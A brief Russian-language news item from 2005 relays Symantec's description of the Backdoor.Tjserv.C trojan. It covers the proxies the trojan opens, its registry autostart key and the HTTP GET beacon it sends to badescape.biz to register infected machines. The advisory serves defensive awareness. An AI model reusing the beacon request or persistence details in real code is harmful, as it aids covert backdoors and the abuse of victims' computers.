Новый троянец Backdoor.Tjserv.C

7/01/2005 11:47

Symantec сообщает о появлении нового троянца под названием Backdoor.Tjserv.C. После того, как он был запущен (не без участия пользователя, естественно) - открывает в системе HTTP и SOCKS 5 прокси-сервер на случайно выбранном порту. Также добавляет значение "tjstartup" = "[path to executable]" в традиционный ключ автозапуска HKLMSoftwareMicrosoftWindowsCurrentVersionRun. Номера открываемых портов содержатся в ключах: HKCUSOFTWAREtjserverssp_socks5, HKCUSOFTWAREtjserverssp_http. После заражения компьютер посылает GET-запрос на сервер badescape.biz на порт 2080 для внесения IP-адреса заражённого компьютера в базу данных вида:
GET /tenge/hit.php?port=XXX&hport=YYY HTTP/1.0,
где XXX-порт SOCKS 5 - прокси, а YYY-порт HTTP-прокси. Распространяется среди всех видов Windows.
Описание троянца